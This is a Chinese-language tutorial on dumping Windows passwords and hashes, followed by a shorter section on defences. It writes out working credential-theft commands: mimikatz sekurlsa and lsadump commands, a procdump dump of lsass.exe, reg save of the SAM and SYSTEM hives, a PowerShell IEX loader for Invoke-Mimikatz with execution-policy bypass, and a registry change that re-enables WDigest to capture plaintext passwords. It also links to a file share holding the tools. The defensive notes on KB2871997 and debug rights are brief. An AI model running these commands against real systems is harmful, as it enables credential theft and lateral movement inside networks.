Windows系统密码抓取与防护
单机密码抓取与防范
LM Hash 和NTLM Hash
LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用
NTLM Hash(MD4加密) 真正是用户密码的哈希值
Windows操作系统中的密码一般由两部分组成:
一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下:
Username:RID:LM-Hash:NT-Hash
(1) GetPass
https://bbs.pediy.com/thread-163383.htm
(2) PwDump7
下载地址:
https://www.openwall.com/passwords/windows-pwdump
https://www.tarasco.org/security/pwdump_7/
Pwdump7可以在CMD下提取出系统中的用户的密码hash (包括LM和NTLM),
需要系统权限,“骨灰”级黑客玩家可能听说过这个玩具。
通过Pwdump7提取出的HASH,可以用ophcrack等工具破出明文密码,
对进一步渗透是有很大帮助的。
工具使用很简单,只需在命令行环境中运行Pwdump7程序,
即可得到当前系统中各个用户的密码Hash (包括LM和NTLM):
(3) Mimikatz
能够直接读取Windows操作系统的明文密码
最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码
登陆系统时输入密码之后,密码便会储存在lsass内存中, 而 mimikatz 正是通过对lsass获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统
注:但是在安装了KB2871997补丁或者系统版本大于win10或windows server 2012时,默认在内存缓存中禁止保存明文密码,
这样利用mimikatz就不能从内存中读出明文密码了,但可以通过修改注册表的方式抓取明文
privilege::debug // 提升至debug权限
sekurlsa::logonpasswords // 抓取密码
(4) Procdump
Procdump是微软官方发布的工具,所以杀软不会拦截,其可以用来将
目标lsass文件导出
下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
先用在目标机器上传微软的工具Procdump,导出其lsass.exe:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
执行mimikatz导出lsass.dmp里面的密码和hash
sekurlsa::minidump .\lsass.dmp // 将导出的lsass.dmp载入到mimikatz中
sekurlsa::logonpasswords full // 获取密码
(5) 通过SAM和System文件抓取密码
先利用注册表命令将目标机的sam或system文件导出,需要管理员权限:
reg save hklm\sam sam.hive
reg save hklm\system system.hive
然后,将目标机上的sam.hive和system.hive下载到本地,
利用mimikatz读取sam和system文件获取NTLM Hash
(保证下载的文件和mimikatz在相同的目录下)
lsadump::sam /sam:sam.hive /system:system.hive
也可以直接使用mimikatz读取本地SAM文件,获得密码Hash:
privilege::debug
token::elevate
lsadump::sam
(6)Powershell脚本
使用powershell脚本加载mimikatz模块获取密码,该脚本位于
powersploit后渗透框架中
下载地址;
https://github.com/PowerShellMafia/PowerSploit
通过在目标机上远程下载执行该powershell脚本即可获取密码,需要管理员权限
脚本代码如下:
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('C:\Users\Administrator\Desktop\Procdump\ProcdumpInvoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
(7) Nishang的Get-PassHashes模块
以管理员身份打开Powershell环境
Import-Module .\Get-PassHashes.ps1
执行Get-PassHashes.ps1 导出散列值
(8) 单机密码抓取的防范方法
微软为了防止用户的明文密码在内存中泄露,发布了KB2871997补丁,
关闭了Wdigest功能。
Windows Server2012及以上版本默认关闭Wdigest,使攻击者无法从内存
中获取明文密码。Windows Server2012以下版本,
如果安装了KB2871997补丁,攻击者同样无法获取明文密码
在命令行环境开启或关闭Wdigest Auth,有如下两种方法
使用 red add命令
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f // 开启Wdigest Auth
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f // 关闭Wdigest Auth
攻击方法:需要将UseLogonCredential的值设为1,然后注销当前用户,用户再次登录后使用mimikatz即可导出明文口令
防范黑客抓取明文密码和散列值
(1) 设置全局安全组
Server2012新增了一个全局安全组,只需要将用户加入到组中,
就无法使用mimikatz等工具抓取明文密码和散列值了
(2)安装KB2871997补丁
安装此补丁能够使本地账号不再被远程接入,但是系统默认的本地管理员账号Administrator这个SID为500的用户例外,即使将用户改名,但是SID任然是500,攻击者任然可以通过横向攻击方法获得内网中其他机器的控制权。
(3) 修改注册表键值禁止内存中存储明文密码
WDigest协议,能够将windows明文密码储存在内存中,方便用户登录本地计算机
命令行环境开启或关闭Wdigest Auth,有如下两种方法
方法(1): reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
方法(2): reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential 查询更改
(4) 防御mimikatz攻击(限制Debug权限)
mimikatz在抓取散列值或者明文密码时需要使用Debug权限,因为mimikatz需要和lsass进程进行交互。将拥有Debug权限的本地管理员从
Administrator组中删除。
工具链接
链接:https://pan.baidu.com/s/1hvr8KTIl6Zx8QJswkl-b8Q
提取码:dxjp